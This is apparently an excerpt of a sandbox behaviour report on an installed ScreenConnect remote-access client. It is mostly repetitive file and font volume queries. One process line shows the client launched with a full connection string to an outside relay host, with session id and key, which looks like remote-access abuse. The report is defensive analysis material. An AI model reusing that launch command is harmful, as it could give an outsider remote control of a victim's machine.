Process created: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe "c:\program files (x86)\screenconnect client (3a24aebb8959bcfa)\screenconnect.clientservice.exe" "?e=access&y=guest&h=instance-xkznvd-relay.screenconnect.com&p=443&s=e3b17808-f02f-4082-a0ad-0ef89097505d&k=bgiaaackaabsu0exaagaaaeaaqbhw2nfb6zupkledihhdvtayuyd858sihfxvlo7ouduhfiakfl%2fps5vluffi688c%2ffi5cxvcjgfshxpqsjscre%2bvzhksrm%2bteue97q6nbz5oegi61hdzk9%2bjy6drnqvjn5o3w4r13ztthxrqvi92kieihsqur1j2%2fl4cjo7mr%2btf3z2fvvhba9ai44ir3hx7t6ycekwsxigwsjwulu6qmsua0yoa6ak5ubrkh%2fug0gs3wbetgsualtj1hdchea2xrvqmqyiwf1moawexddmh4ktymunwgxslao6chtqtobuldnoq2rzutbk681gaiktevzer9dayt7dfk5ghsogr7cx&c=envioparaiba20%2f10&c=&c=&c=&c=&c=&c=&c="

Source: ScreenConnect.WindowsClient.exe, 00000007.00000000.1732916566.0000000000042000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.WindowsClient.exe.1.dr	Binary or memory string: Progman
Source: ScreenConnect.WindowsClient.exe, 00000007.00000000.1732916566.0000000000042000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.WindowsClient.exe.1.dr	Binary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass

Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\MSIBC6.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\MSIBC6.tmp-\ScreenConnect.InstallerActions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\MSIBC6.tmp-\ScreenConnect.Core.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\MSIBC6.tmp-\ScreenConnect.Windows.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.Core.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.Windows.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.Client.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.Client.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.Core.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.Windows.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
